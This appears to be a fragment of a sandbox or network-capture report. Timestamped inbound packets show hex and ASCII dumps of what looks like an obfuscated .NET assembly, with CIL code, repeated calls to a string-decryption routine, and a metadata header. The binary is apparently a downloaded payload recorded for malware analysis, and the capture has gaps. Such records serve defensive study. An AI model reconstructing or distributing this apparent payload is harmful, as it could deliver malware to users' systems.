2023-11-18 09:03:00 UTC	10542	IN	Data Raw: 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 e9 01 00 00 02 01 00 00 eb 02 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 43 00 00 00 c1 02 00 00 04 03 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 14 00 00 00 fc 02 00 00 10 03 00 00 03 00 00 00 1c 00 00 01 13 30 08 00 ea 01 00 00 1f 00 00 11 28 56 00 00 06 0a 73 79 00 00 06 0b 20 7c 8c 69 29 28 df 00 00 06 1f 11 8d 1c 00 00 01 25 16 28 29 00 00 0a 8c 14 00 00 01 a2 25 17 07 20 7c 8a 69 29 28 df 00 00 06 7e 25 00 00 04 16 6f 7a 00 00 06 a2 25 18 07 20 8f 8a 69 29 28 df 00 00 06 7e 25 00 00 04 16 6f 7a 00 00 06 a2 25 19 07 20 94 8a 69 29 28 df 00 00 06 7e 25 00 00 04 16 6f 7a 00 00 06 a2 25 1a 07 20 a5 8a 69 29 28 df 00 00 06 7e 25 00 00 04 16 6f 7a 00 00 06 a2 25 1b 07 20 a9 8a 69 29 28 df 00 00 06 7e 25 00 00 04 16 Data Ascii: C0(Vsy \|i)(%()% \|i)(~%oz% i)(~%oz% i)(~%oz% i)(~%oz% i)(~%
2023-11-18 09:03:00 UTC	10543	IN	Data Raw: 03 1c 00 00 01 1b 30 02 00 96 00 00 00 25 00 00 11 20 bb b6 69 29 28 df 00 00 06 73 30 00 00 0a 6f 31 00 00 0a 6f 32 00 00 0a 0a 2b 55 06 6f 33 00 00 0a 20 e1 b6 69 29 28 df 00 00 06 6f 34 00 00 0a 25 2d 04 26 14 2b 05 6f 05 00 00 0a 25 2d 0b 26 20 06 b5 69 29 28 df 00 00 06 28 a7 00 00 0a 23 00 00 00 00 00 00 90 40 5b 23 00 00 00 00 00 00 90 40 5b 23 00 00 00 00 00 00 90 40 5b 0b de 23 06 6f 38 00 00 0a 2d a3 de 0a 06 2c 06 06 6f 06 00 00 0a dc de 03 26 de 00 23 00 00 00 00 00 00 00 00 2a 07 2a 00 00 01 18 00 00 02 00 1a 00 61 7b 00 0a 00 00 00 00 00 00 00 00 87 87 00 03 1c 00 00 01 1b 30 04 00 48 01 00 00 26 00 00 11 73 a8 00 00 0a 0a 73 40 00 00 0a 25 20 0d b5 69 29 28 df 00 00 06 20 26 b5 69 29 28 df 00 00 06 6f 65 00 00 0a 25 20 33 b5 69 29 28 df 00 Data Ascii: 0% i)(s0o1o2+Uo3 i)(o4%-&+o%-& i)((#@[#@[#@[#o8-,o&#**a{0H&ss@% i)( &i)(oe% 3i)(
2023-11-18 09:03:00 UTC	10545	IN	Data Raw: 00 00 00 00 13 30 06 00 43 02 00 00 29 00 00 11 12 00 73 5f 00 00 0a 7d 98 00 00 04 12 00 20 41 b4 69 29 28 df 00 00 06 14 20 bf 4b 96 d6 28 df 00 00 06 28 bc 00 00 0a 25 2d 04 26 14 2b 05 6f 05 00 00 0a 7d 99 00 00 04 06 7b 99 00 00 04 2d 0c 06 7b 98 00 00 04 6f 77 00 00 0a 2a 12 00 06 7b 99 00 00 04 17 06 7b 99 00 00 04 6f 79 00 00 0a 18 59 6f 84 00 00 0a 17 8d 36 00 00 01 25 16 1f 2c 9d 6f 3d 00 00 0a 16 9a 73 96 00 00 0a 28 bd 00 00 0a 7d 99 00 00 04 06 7b 99 00 00 04 2d 0c 06 7b 98 00 00 04 6f 77 00 00 0a 2a 12 00 06 7b 99 00 00 04 20 69 b4 69 29 28 df 00 00 06 28 69 00 00 0a 7d 99 00 00 04 06 7b 99 00 00 04 28 6a 00 00 0a 2d 0c 06 7b 98 00 00 04 6f 77 00 00 0a 2a 06 7b 99 00 00 04 28 6b 00 00 0a 0b 16 0c 38 cf 00 00 00 07 08 9a 0d 73 34 01 00 06 13 Data Ascii: 0C)s_} Ai)( K((%-&+o}{-{ow{{oyYo6%,o=s(}{-{ow{ ii)((i}{(j-{ow*{(k8s4
2023-11-18 09:03:00 UTC	10546	IN	Data Raw: 00 00 0a 2d 46 7e 26 00 00 04 1b 8d 29 00 00 01 25 16 20 0a b2 69 29 28 df 00 00 06 a2 25 17 11 04 a2 25 18 20 25 b2 69 29 28 df 00 00 06 a2 25 19 11 05 a2 25 1a 20 32 b2 69 29 28 df 00 00 06 a2 28 74 00 00 0a 6f 3e 00 00 0a 08 17 58 0c 08 07 8e 69 3f 63 ff ff ff 2a 00 00 00 13 30 05 00 46 00 00 00 00 00 00 00 7e 19 00 00 04 17 58 80 19 00 00 04 20 38 b2 69 29 28 df 00 00 06 1d 8d 1c 00 00 01 25 16 02 a2 25 17 03 a2 25 18 04 a2 25 19 05 a2 25 1a 0e 04 8c 5c 00 00 01 a2 25 1b 0e 05 a2 25 1c 0e 06 a2 28 9f 00 00 0a 2a 00 00 13 30 04 00 86 00 00 00 00 00 00 00 1f 0d 8d 29 00 00 01 25 16 20 86 b2 69 29 28 df 00 00 06 a2 25 17 02 a2 25 18 20 94 b2 69 29 28 df 00 00 06 a2 25 19 03 a2 25 1a 20 a0 b2 69 29 28 df 00 00 06 a2 25 1b 04 a2 25 1c 20 bc b2 69 29 28 df Data Ascii: -F~&)% i)(%% %i)(%% 2i)((to>Xi?c0F~X 8i)(%%%%%\%%(0)% i)(%% i)(%% i)(%% i)(
2023-11-18 09:03:00 UTC	10547	IN	Data Raw: c5 06 2d 06 7e 44 00 00 0a 2a 7e 44 00 00 0a 0c 16 0d 04 06 04 6f 79 00 00 0a 06 59 6f 84 00 00 0a 13 04 16 13 06 2b 6a 09 2d 11 11 04 11 06 6f d8 00 00 0a 1f 22 33 04 17 0d 2b 50 09 2c 4d 11 04 11 06 6f d8 00 00 0a 1f 22 33 27 11 04 11 06 17 59 6f d8 00 00 0a 1f 5c 2e 18 02 02 7b 27 00 00 04 06 11 06 17 58 25 13 06 58 58 7d 27 00 00 04 2b 2a 08 11 04 11 06 6f d8 00 00 0a 13 07 12 07 28 d9 00 00 0a 28 47 00 00 0a 0c 11 06 17 58 13 06 11 06 11 04 6f 79 00 00 0a 32 8b 08 2a 1b 30 07 00 fb 00 00 00 33 00 00 11 28 da 00 00 0a 13 04 12 04 fe 16 64 00 00 01 6f 05 00 00 0a 0a 73 db 00 00 0a 0b 12 02 16 06 28 7c 00 00 06 0d 09 2c 06 73 db 00 00 0a 2a 00 16 13 05 16 13 06 17 8d 29 00 00 01 25 16 02 a2 13 07 08 11 07 8e 69 11 07 16 14 16 14 28 7b 00 00 06 0d 09 2c Data Ascii: -~D~DoyYo+j-o"3+P,Mo"3'Yo\.{'X%XX}'+o((GXoy203(dos(\|,s)%i({,
2023-11-18 09:03:00 UTC	10548	IN	Data Raw: 11 04 59 17 6a 58 58 13 07 02 11 07 69 28 8e 00 00 06 13 08 11 08 13 09 02 11 07 69 11 08 28 8f 00 00 06 13 0a 14 13 0b 11 07 11 08 6a 59 17 6a 58 13 0c 16 13 0d 38 c2 00 00 00 12 0b 11 0d 17 58 28 27 00 00 2b 11 09 17 58 13 0f 02 11 0f 28 8e 00 00 06 13 09 11 0b 11 0d 8f 52 00 00 02 02 11 0f 11 09 28 8f 00 00 06 7d bb 00 00 04 11 0b 11 0d 8f 52 00 00 02 11 0b 11 0d 8f 52 00 00 02 7b bb 00 00 04 1f 09 6a 31 43 11 0b 11 0d 8f 52 00 00 02 7b bb 00 00 04 28 90 00 00 06 2c 17 11 0b 11 0d 8f 52 00 00 02 7b bb 00 00 04 1f 0d 6a 59 18 6a 5b 2b 2e 11 0b 11 0d 8f 52 00 00 02 7b bb 00 00 04 1f 0c 6a 59 18 6a 5b 2b 17 02 7b 2a 00 00 04 11 0b 11 0d 8f 52 00 00 02 7b bb 00 00 04 d4 91 6e 7d ba 00 00 04 11 0c 11 09 11 0f 59 6a 58 17 6a 58 13 0c 11 0d 17 58 13 0d 11 0c Data Ascii: YjXXi(i(jYjX8X('+X(R(}RR{j1CR{(,R{jYj[+.R{jYj[+{*R{n}YjXjXX
2023-11-18 09:03:00 UTC	10550	IN	Data Raw: 8d 5c 00 00 01 13 0e 16 13 0f 2b 6a 11 0c 17 58 13 10 02 11 10 28 8e 00 00 06 13 0c 11 0e 11 0f 02 11 10 11 0c 28 8f 00 00 06 9f 11 0e 11 0f 11 0e 11 0f 96 1f 09 6a 31 28 11 0e 11 0f 96 28 90 00 00 06 2c 0e 11 0e 11 0f 96 1f 0d 6a 59 18 6a 5b 2b 1c 11 0e 11 0f 96 1f 0c 6a 59 18 6a 5b 2b 0e 02 7b 2a 00 00 04 11 0e 11 0f 96 d4 91 6e 9f 11 0f 17 58 13 0f 11 0f 1a 31 91 02 7b 2b 00 00 04 17 6a 2e 0d 02 7b 2b 00 00 04 18 6a 40 d2 00 00 00 02 7b 2b 00 00 04 13 11 11 11 17 6a 59 25 18 6a 36 06 26 38 ba 00 00 00 6d 45 03 00 00 00 05 00 00 00 3c 00 00 00 73 00 00 00 38 a3 00 00 00 02 7b 2f 00 00 04 08 11 06 69 58 8f 54 00 00 02 28 f1 00 00 0a 02 7b 2c 00 00 04 11 0a 11 0d 58 11 0e 16 96 58 69 11 0e 17 96 69 6f cd 00 00 0a 7d bd 00 00 04 2b 6c 02 7b 2f 00 00 04 08 Data Ascii: \+jX((j1((,jYj[+jYj[+{*nX1{+j.{+j@{+jY%j6&8mE<s8{/iXT({,XXiio}+l{/
2023-11-18 09:03:00 UTC	10551	IN	Data Raw: f8 00 00 0a 13 07 dd b4 00 00 00 17 0c 17 0d 1d 13 04 16 13 05 08 2c 15 06 16 02 7b 2c 00 00 04 04 17 59 91 9c 04 17 59 10 02 17 13 05 04 17 59 13 06 2b 74 11 06 17 59 03 32 44 06 11 05 02 7b 2c 00 00 04 11 06 91 09 17 59 1f 1f 5f 63 20 ff 00 00 00 09 1f 1f 5f 63 5f 02 7b 2c 00 00 04 11 06 17 59 91 11 04 1f 1f 5f 62 60 d2 9c 09 17 58 0d 11 05 17 58 13 05 11 04 17 59 13 04 2b 23 08 2d 20 06 11 05 02 7b 2c 00 00 04 11 06 91 09 17 59 1f 1f 5f 63 20 ff 00 00 00 09 1f 1f 5f 63 5f d2 9c 11 06 15 58 13 06 11 06 03 2f 87 06 16 28 f8 00 00 0a 13 07 de 07 26 16 6a 13 07 de 00 11 07 2a 00 00 01 0c 00 00 00 00 00 00 fc fc 00 07 1c 00 00 01 13 30 03 00 5c 00 00 00 3e 00 00 11 20 b5 01 00 00 28 f9 00 00 0a 80 3c 00 00 04 20 00 01 00 00 8d 67 00 00 01 80 3b 00 00 04 16 Data Ascii: ,{,YYY+tY2D{,Y_c _c_{,Y_b`XXY+#- {,Y_c _c_X/(&j*0\> (< g;
2023-11-18 09:03:00 UTC	10552	IN	Data Raw: 6f fe 00 00 0a 02 7b 34 00 00 04 16 28 04 01 00 0a 16 18 6f fe 00 00 0a 02 7b 34 00 00 04 16 28 04 01 00 0a 16 18 6f fe 00 00 0a 02 7b 34 00 00 04 20 00 81 00 00 28 04 01 00 0a 16 18 6f fe 00 00 0a 02 7b 34 00 00 04 03 7b c8 00 00 04 28 98 00 00 06 28 05 01 00 0a 16 1a 6f fe 00 00 0a 02 7b 34 00 00 04 06 16 06 8e 69 6f fe 00 00 0a 02 7b 34 00 00 04 08 16 08 8e 69 6f fe 00 00 0a 02 7b 34 00 00 04 07 16 07 8e 69 6f fe 00 00 0a 2a 00 00 00 13 30 04 00 d6 01 00 00 43 00 00 11 02 7b 34 00 00 04 6f 06 01 00 0a 0a 02 7b 34 00 00 04 06 6f 07 01 00 0a 02 7b 34 00 00 04 1a 8d 45 00 00 01 25 d0 5e 00 00 04 28 ea 00 00 0a 16 1a 6f fe 00 00 0a 02 7b 34 00 00 04 1f 2c 6a 28 08 01 00 0a 16 1e 6f fe 00 00 0a 02 7b 34 00 00 04 1f 2d 28 04 01 00 0a 16 18 6f fe 00 00 0a 02 Data Ascii: o{4(o{4(o{4 (o{4{((o{4io{4io{4io*0C{4o{4o{4E%^(o{4,j(o{4-(o
2023-11-18 09:03:00 UTC	10554	IN	Data Raw: 34 00 00 04 03 7b c4 00 00 04 28 04 01 00 0a 16 18 6f fe 00 00 0a 02 7b 34 00 00 04 03 7b c8 00 00 04 1f 0e 6a 58 6f 07 01 00 0a 02 7b 34 00 00 04 03 7b c9 00 00 04 28 05 01 00 0a 16 1a 6f fe 00 00 0a 02 7b 34 00 00 04 03 7b c7 00 00 04 28 98 00 00 06 28 05 01 00 0a 16 1a 6f fe 00 00 0a 02 7b 34 00 00 04 03 7b c6 00 00 04 28 98 00 00 06 28 05 01 00 0a 16 1a 6f fe 00 00 0a 02 7b 34 00 00 04 06 6f 07 01 00 0a 2a 13 30 05 00 37 00 00 00 46 00 00 11 03 1f 5c 1f 2f 6f 16 01 00 0a 10 01 03 1f 3a 6f f7 00 00 0a 0a 06 16 32 0c 03 16 06 17 58 6f 17 01 00 0a 10 01 03 17 8d 36 00 00 01 25 16 1f 2f 9d 6f 18 01 00 0a 2a 00 13 30 04 00 ac 00 00 00 47 00 00 11 28 25 00 00 0a 02 16 18 6f cd 00 00 0a 20 03 b0 69 29 28 df 00 00 06 28 3c 00 00 0a 2c 24 02 28 aa 00 00 06 13 Data Ascii: 4{(o{4{jXo{4{(o{4{((o{4{((o{4o07F\/o:o2Xo6%/o0G(%o i)((<,$(
2023-11-18 09:03:00 UTC	10555	IN	Data Raw: 12 02 02 8e 69 28 1d 01 00 0a 7d d6 00 00 04 12 02 02 8e 69 7d d5 00 00 04 02 16 08 7b d6 00 00 04 02 8e 69 28 24 01 00 0a de 03 26 de 00 20 d8 bf 69 29 28 df 00 00 06 20 f5 bf 69 29 28 df 00 00 06 28 32 00 00 2b 12 02 12 04 12 01 7e ad 00 00 0a 12 03 17 12 00 6f 6b 01 00 06 26 06 7b d5 00 00 04 8d 45 00 00 01 13 06 06 7b d6 00 00 04 11 06 16 06 7b d5 00 00 04 28 25 01 00 0a 11 06 13 07 de 62 26 de 58 06 7b d6 00 00 04 7e ad 00 00 0a 28 26 01 00 0a 2c 0b 06 7b d6 00 00 04 28 1b 01 00 0a 08 7b d6 00 00 04 7e ad 00 00 0a 28 26 01 00 0a 2c 0b 08 7b d6 00 00 04 28 1b 01 00 0a 07 7b d6 00 00 04 7e ad 00 00 0a 28 26 01 00 0a 2c 0b 07 7b d6 00 00 04 28 1b 01 00 0a dc 16 8d 45 00 00 01 2a 11 07 2a 01 24 00 00 00 00 50 00 36 86 00 03 1c 00 00 01 00 00 50 00 8f df Data Ascii: i(}i}{i($& i)( i)((2+~ok&{E{{(%b&X{~(&,{({~(&,{({~(&,{(E**$P6P
2023-11-18 09:03:00 UTC	10556	IN	Data Raw: 07 11 07 8e 69 02 28 b3 00 00 06 8e 69 58 8d 45 00 00 01 13 0d 11 07 16 11 0d 16 11 07 8e 69 28 88 00 00 0a 02 28 b3 00 00 06 16 11 0d 11 07 8e 69 02 28 b3 00 00 06 8e 69 28 88 00 00 0a 11 0c 11 0d 6f ab 00 00 0a 13 08 de 0c 11 0c 2c 07 11 0c 6f 06 00 00 0a dc 11 06 8e 69 11 08 8e 69 58 8d 45 00 00 01 13 09 11 06 16 11 09 16 11 06 8e 69 28 88 00 00 0a 11 08 16 11 09 11 06 8e 69 11 08 8e 69 28 88 00 00 0a 02 1f 18 8d 45 00 00 01 28 b5 00 00 06 16 13 0e 2b 14 02 28 b4 00 00 06 11 0e 11 09 11 0e 91 9c 11 0e 17 58 13 0e 11 0e 02 28 b4 00 00 06 8e 69 32 e0 02 1e 8d 45 00 00 01 28 b7 00 00 06 02 28 b6 00 00 06 8e 69 17 59 13 0a 11 09 8e 69 17 59 13 0f 2b 1a 02 28 b6 00 00 06 11 0a 11 09 11 0f 91 9c 11 0a 17 59 13 0a 11 0f 17 59 13 0f 11 0f 11 09 8e 69 02 28 b6 Data Ascii: i(iXEi((i(i(o,oiiXEi(ii(E(+(X(i2E((iYiY+(YYi(
2023-11-18 09:03:00 UTC	10558	IN	Data Raw: 00 06 16 06 02 28 bf 00 00 06 8e 69 02 28 c0 00 00 06 8e 69 28 21 01 00 0a 73 2d 01 00 0a 06 28 ab 00 00 0a 0b 18 8d 45 00 00 01 25 16 1a 9c 25 17 1f 0e 9c 13 04 11 04 8e 69 02 28 c2 00 00 06 8e 69 58 8d 45 00 00 01 0c 11 04 16 08 16 11 04 8e 69 28 21 01 00 0a 02 28 c2 00 00 06 16 08 11 04 8e 69 02 28 c2 00 00 06 8e 69 28 21 01 00 0a 73 39 01 00 0a 07 02 28 c1 00 00 06 17 73 c8 00 00 06 1f 20 6f c9 00 00 06 0d 73 3a 01 00 0a 25 17 6f 31 01 00 0a 25 20 80 00 00 00 6f 3b 01 00 0a 25 20 00 01 00 00 6f 3c 01 00 0a 25 19 6f 32 01 00 0a 09 08 6f 35 01 00 0a 02 28 be 00 00 06 16 02 28 be 00 00 06 8e 69 6f 3d 01 00 0a 2a 13 30 03 00 ae 00 00 00 00 00 00 00 02 17 7d 49 00 00 04 02 28 0f 00 00 0a 02 03 25 2d 1b 26 20 0b be 69 29 28 df 00 00 06 20 1a be 69 29 28 df Data Ascii: (i(i(!s-(E%%i(iXEi(!(i(i(!s9(s os:%o1% o;% o<%o2o5((io=*0}I(%-& i)( i)(
2023-11-18 09:03:00 UTC	10559	IN	Data Raw: 00 00 02 00 6f 01 1f 8e 01 0e 00 00 00 00 1b 30 06 00 42 02 00 00 57 00 00 11 02 28 0f 00 00 0a 73 49 01 00 0a 0a 02 73 4a 01 00 0a 7d 5a 00 00 04 03 73 5b 00 00 0a 13 04 11 04 73 4b 01 00 0a 13 05 16 13 06 11 05 6f 4c 01 00 0a 6f 06 01 00 0a 69 13 07 2b 13 06 11 05 6f 4d 01 00 0a 6f 4e 01 00 0a 11 06 17 58 13 06 11 06 11 07 32 e7 de 18 11 05 2c 07 11 05 6f 06 00 00 0a dc 11 04 2c 07 11 04 6f 06 00 00 0a dc 06 6f 4f 01 00 0a 16 1a 16 28 dd 00 00 06 28 50 01 00 0a 20 3f bd 69 29 28 df 00 00 06 20 c1 42 96 d6 28 df 00 00 06 6f 3f 00 00 0a 06 6f 4f 01 00 0a 1f 0c 1a 17 28 dd 00 00 06 16 28 1c 01 00 0a 0b 20 46 bd 69 29 28 df 00 00 06 6f 51 01 00 0a 2d 01 2a 06 6f 4f 01 00 0a 1f 38 1a 16 28 dd 00 00 06 28 50 01 00 0a 20 56 bd 69 29 28 df 00 00 06 20 aa 42 96 Data Ascii: o0BW(sIsJ}Zs[sKoLoi+oMoNX2,o,ooO((P ?i)( B(o?oO(( Fi)(oQ-*oO8((P Vi)( B
2023-11-18 09:03:00 UTC	10560	IN	Data Raw: fe 33 1d 02 7b 72 00 00 04 28 6e 01 00 0a 6f 6f 01 00 0a 33 0b 02 16 7d 70 00 00 04 02 0a 2b 07 16 73 f2 00 00 06 0a 06 2a 13 30 07 00 b8 00 00 00 5d 00 00 11 28 25 00 00 0a 03 1a 6f 73 01 00 0a 74 1c 00 00 1b 6f 55 00 00 0a 03 1f 0a 6f 73 01 00 0a a5 6b 00 00 01 17 6a fe 01 13 06 12 06 28 74 01 00 0a 6f 75 01 00 0a 0a 28 25 00 00 0a 03 1b 6f 73 01 00 0a 74 1c 00 00 1b 6f 55 00 00 0a 0b 03 1f 09 6f 73 01 00 0a a5 6b 00 00 01 17 6a fe 01 13 06 12 06 28 74 01 00 0a 6f 75 01 00 0a 0c 03 1c 6f 73 01 00 0a a5 6b 00 00 01 0d 28 25 00 00 0a 03 18 6f 73 01 00 0a 74 1c 00 00 1b 6f 55 00 00 0a 13 04 28 25 00 00 0a 03 19 6f 73 01 00 0a 74 1c 00 00 1b 6f 55 00 00 0a 13 05 06 07 08 09 11 04 11 05 28 6b 00 00 06 2a 13 30 04 00 34 00 00 00 13 00 00 11 28 25 00 00 0a 03 Data Ascii: 3{r(noo3}p+s0](%ostoUoskj(tou(%ostoUoskj(touosk(%ostoU(%ostoU(k04(%
2023-11-18 09:03:00 UTC	10562	IN	Data Raw: 00 00 04 2a 13 30 02 00 75 00 00 00 00 00 00 00 02 7b de 00 00 04 7e ad 00 00 0a 28 26 01 00 0a 2c 0b 02 7b de 00 00 04 28 1b 01 00 0a 02 7b e2 00 00 04 7e ad 00 00 0a 28 26 01 00 0a 2c 0b 02 7b e2 00 00 04 28 1b 01 00 0a 02 7b e0 00 00 04 7e ad 00 00 0a 28 26 01 00 0a 2c 0b 02 7b e0 00 00 04 28 1b 01 00 0a 02 7b e4 00 00 04 7e ad 00 00 0a 28 26 01 00 0a 2c 0b 02 7b e4 00 00 04 28 1b 01 00 0a 2a 00 00 00 42 53 4a 42 01 00 01 00 00 00 00 00 0c 00 00 00 76 34 2e 30 2e 33 30 33 31 39 00 00 00 00 04 00 60 00 00 00 ce 51 00 00 23 7e 00 00 2e 52 00 00 4c 0f 01 00 23 53 74 72 69 6e 67 73 00 00 00 00 7a 61 01 00 10 00 00 00 23 47 55 49 44 00 00 00 8a 61 01 00 30 17 00 00 23 42 6c 6f 62 00 00 00 00 00 00 00 02 00 01 01 57 bf a2 3f 09 1e 00 00 00 fa 01 33 00 16 00 Data Ascii: 0u{~(&,{({~(&,{({~(&,{({~(&,{(BSJBv4.0.30319`Q#~.RL#Stringsza#GUIDa0#BlobW?3
2023-11-18 09:03:00 UTC	10563	IN	Data Raw: 05 00 00 5e 0d 00 00 06 00 85 0f 00 00 5e 0d 00 00 1a 00 0b 15 00 00 f3 15 00 00 06 00 cf 01 00 00 5e 0d 00 00 06 00 25 18 00 00 75 0e 00 00 06 00 28 14 00 00 7d 12 00 00 06 00 8d 06 00 00 5e 0d 00 00 06 00 94 02 00 00 5e 0d 00 00 06 00 a6 0f 00 00 5e 0d 00 00 06 00 28 11 00 00 5e 0d 00 00 06 00 4f 0f 00 00 5e 0d 00 00 12 00 10 0d 00 00 1a 0e 00 00 12 00 e9 05 00 00 1a 0e 00 00 06 00 be 10 00 00 5e 0d 00 00 06 00 2d 0a 00 00 5e 0d 00 00 06 00 59 10 00 00 05 18 00 00 06 00 e3 00 00 00 05 18 00 00 06 00 03 05 00 00 05 18 00 00 06 00 73 10 00 00 05 18 00 00 06 00 65 0d 00 00 05 18 00 00 06 00 f9 05 00 00 05 18 00 00 06 00 cc 05 00 00 05 18 00 00 06 00 a3 0d 00 00 05 18 00 00 06 00 1e 0d 00 00 05 18 00 00 06 00 d8 05 00 00 05 18 00 00 06 00 34 10 00 00 5e 04 Data Ascii: ^^^%u(}^^^(^O^^-^Yse4^
2023-11-18 09:03:00 UTC	10564	IN	Data Raw: 00 00 71 00 62 00 df 00 03 21 10 00 cb 6a 00 00 00 00 00 00 71 00 63 00 e0 00 03 01 10 00 f4 74 00 00 00 00 00 00 71 00 65 00 e3 00 03 01 10 00 a6 04 01 00 00 00 00 00 71 00 66 00 e5 00 03 21 10 00 3a 02 01 00 00 00 00 00 71 00 67 00 e7 00 03 01 10 00 0e 90 00 00 00 00 00 00 71 00 6e 00 ef 00 03 01 10 00 ae e4 00 00 00 00 00 00 71 00 70 00 f2 00 03 01 10 00 ae 03 01 00 00 00 00 00 71 00 73 00 fa 00 03 01 10 00 86 08 01 00 00 00 00 00 71 00 74 00 fc 00 03 21 10 00 66 0c 01 00 00 00 00 00 71 00 75 00 fe 00 03 01 10 00 a0 9c 00 00 00 00 00 00 71 00 7f 00 09 01 03 01 10 00 84 82 00 00 00 00 00 00 71 00 80 00 0b 01 03 21 10 00 54 3f 00 00 00 00 00 00 71 00 81 00 0d 01 03 01 10 00 fa 2b 00 00 00 00 00 00 71 00 84 00 11 01 03 01 10 00 82 f9 00 00 00 00 00 00 71 Data Ascii: qb!jqctqeqf!:qgqnqpqsqt!fquqq!T?q+qq
2023-11-18 09:03:00 UTC	10566	IN	Data Raw: 77 00 00 15 00 01 00 e0 c1 00 00 1c 00 51 80 f4 a1 00 00 1c 00 51 80 8a f8 00 00 1c 00 21 00 c0 4f 00 00 2c 00 21 00 42 01 01 00 30 00 21 00 76 eb 00 00 2c 00 21 00 b4 25 00 00 30 00 01 00 e4 76 00 00 33 00 01 00 f8 be 00 00 37 00 01 00 75 58 00 00 3d 00 51 80 8e 29 00 00 23 00 51 80 9e e6 00 00 23 00 21 00 68 de 00 00 43 00 01 00 c9 a6 00 00 4c 00 01 00 c2 f1 00 00 09 00 21 00 e5 85 00 00 2c 00 21 00 83 65 00 00 50 00 01 00 e8 3c 00 00 53 00 01 00 cf 0e 01 00 23 00 01 00 f8 83 00 00 23 00 31 00 d6 fe 00 00 57 00 31 00 2e 43 00 00 5b 00 21 00 e9 59 00 00 2c 00 21 00 7b 1d 00 00 2c 00 21 00 02 2b 00 00 2c 00 21 00 dd 86 00 00 2c 00 01 00 fa af 00 00 2c 00 01 00 c2 89 00 00 2c 00 21 00 b5 42 00 00 2c 00 21 00 57 d1 00 00 2c 00 21 00 d9 5b 00 00 2c 00 21 00 Data Ascii: wQQ!O,!B0!v,!%0v37uX=Q)#Q#!hCL!,!eP<S##1W1.C[!Y,!{,!+,!,,,!B,!W,![,!
2023-11-18 09:03:00 UTC	10567	IN	Data Raw: 00 00 1c 00 06 00 14 55 00 00 1c 00 06 00 f2 eb 00 00 0c 02 06 00 96 06 01 00 09 00 06 00 84 bd 00 00 1c 00 06 00 2d 61 00 00 0c 02 06 06 80 04 00 00 1c 00 56 80 ae 05 00 00 6b 00 56 80 c5 10 00 00 6b 00 56 80 cf 0b 00 00 6b 00 56 80 e6 10 00 00 6b 00 06 00 4f d2 00 00 1c 00 06 00 46 c4 00 00 1c 00 21 00 5f d0 00 00 0c 02 21 00 98 54 00 00 1c 00 21 00 ea ec 00 00 0c 02 21 00 2b b9 00 00 1c 00 21 00 97 c9 00 00 0c 02 21 00 9b d8 00 00 1c 00 21 00 66 2e 00 00 0c 02 21 00 fe f9 00 00 1c 00 06 00 f2 0a 01 00 1c 00 06 00 d1 e0 00 00 50 00 06 00 f0 3b 00 00 1c 00 f1 4c 00 00 00 00 91 18 03 12 00 00 0f 02 01 00 f3 4c 00 00 00 00 86 08 44 4f 00 00 13 02 01 00 fb 4c 00 00 00 00 86 08 d1 5c 00 00 18 02 01 00 03 4d 00 00 00 00 86 18 fd 11 00 00 1d 02 01 00 04 57 00 Data Ascii: U-aVkVkVkVkOF!_!T!!+!!!f.!P;LLDOL\MW
2023-11-18 09:03:00 UTC	10568	IN	Data Raw: 02 29 00 fc 4e 00 00 00 00 c6 08 28 7e 00 00 78 02 29 00 64 84 00 00 00 00 c4 00 48 7a 00 00 7e 02 29 00 ff 4e 00 00 00 00 86 18 fd 11 00 00 42 02 29 00 07 4f 00 00 00 00 c6 08 28 7e 00 00 78 02 29 00 f0 87 00 00 00 00 c4 00 cd 88 00 00 7e 02 29 00 e8 89 00 00 00 00 96 00 5a fe 00 00 60 02 29 00 0a 4f 00 00 00 00 91 00 8b 64 00 00 60 02 29 00 44 8a 00 00 00 00 91 00 c8 40 00 00 d6 02 29 00 f0 8a 00 00 00 00 91 00 c1 5e 00 00 60 02 29 00 a8 8b 00 00 00 00 96 00 83 db 00 00 d6 02 29 00 60 8c 00 00 00 00 91 00 a0 53 00 00 60 02 29 00 fc 8c 00 00 00 00 91 00 2b c7 00 00 de 02 29 00 bc 8d 00 00 00 00 96 00 ca f0 00 00 60 02 29 00 4a 4f 00 00 00 00 86 18 fd 11 00 00 42 02 29 00 52 4f 00 00 00 00 91 18 03 12 00 00 0f 02 29 00 5e 4f 00 00 00 00 c6 08 28 7e 00 00 Data Ascii: )N(~x)dHz~)NB)O(~x)~)Z`)Od`)D@)^`))`S`)+)`)JOB)RO)^O(~
2023-11-18 09:03:00 UTC	10573	IN	Data Raw: 00 00 03 00 86 18 fd 11 00 00 9e 05 17 01 00 00 00 00 03 00 c6 01 4e 06 00 00 79 06 19 01 00 00 00 00 03 00 c6 01 55 06 00 00 85 06 1f 01 00 00 00 00 03 00 c6 01 4b 06 00 00 95 06 27 01 00 00 00 00 03 00 86 18 fd 11 00 00 9e 05 29 01 00 00 00 00 03 00 c6 01 4e 06 00 00 9d 06 2b 01 00 00 00 00 03 00 c6 01 55 06 00 00 a7 06 30 01 00 00 00 00 03 00 c6 01 4b 06 00 00 73 06 37 01 00 00 00 00 03 00 86 18 fd 11 00 00 9e 05 38 01 00 00 00 00 03 00 c6 01 4e 06 00 00 b5 06 3a 01 00 00 00 00 03 00 c6 01 55 06 00 00 c4 06 43 01 00 00 00 00 03 00 c6 01 4b 06 00 00 5b 06 4e 01 00 00 00 00 03 00 86 18 fd 11 00 00 9e 05 50 01 00 00 00 00 03 00 c6 01 4e 06 00 00 d7 06 52 01 00 00 00 00 03 00 c6 01 55 06 00 00 a9 05 53 01 00 00 00 00 03 00 c6 01 4b 06 00 00 73 06 56 01 00 Data Ascii: NyUK')N+U0Ks78N:UCK[NPNRUSKsV
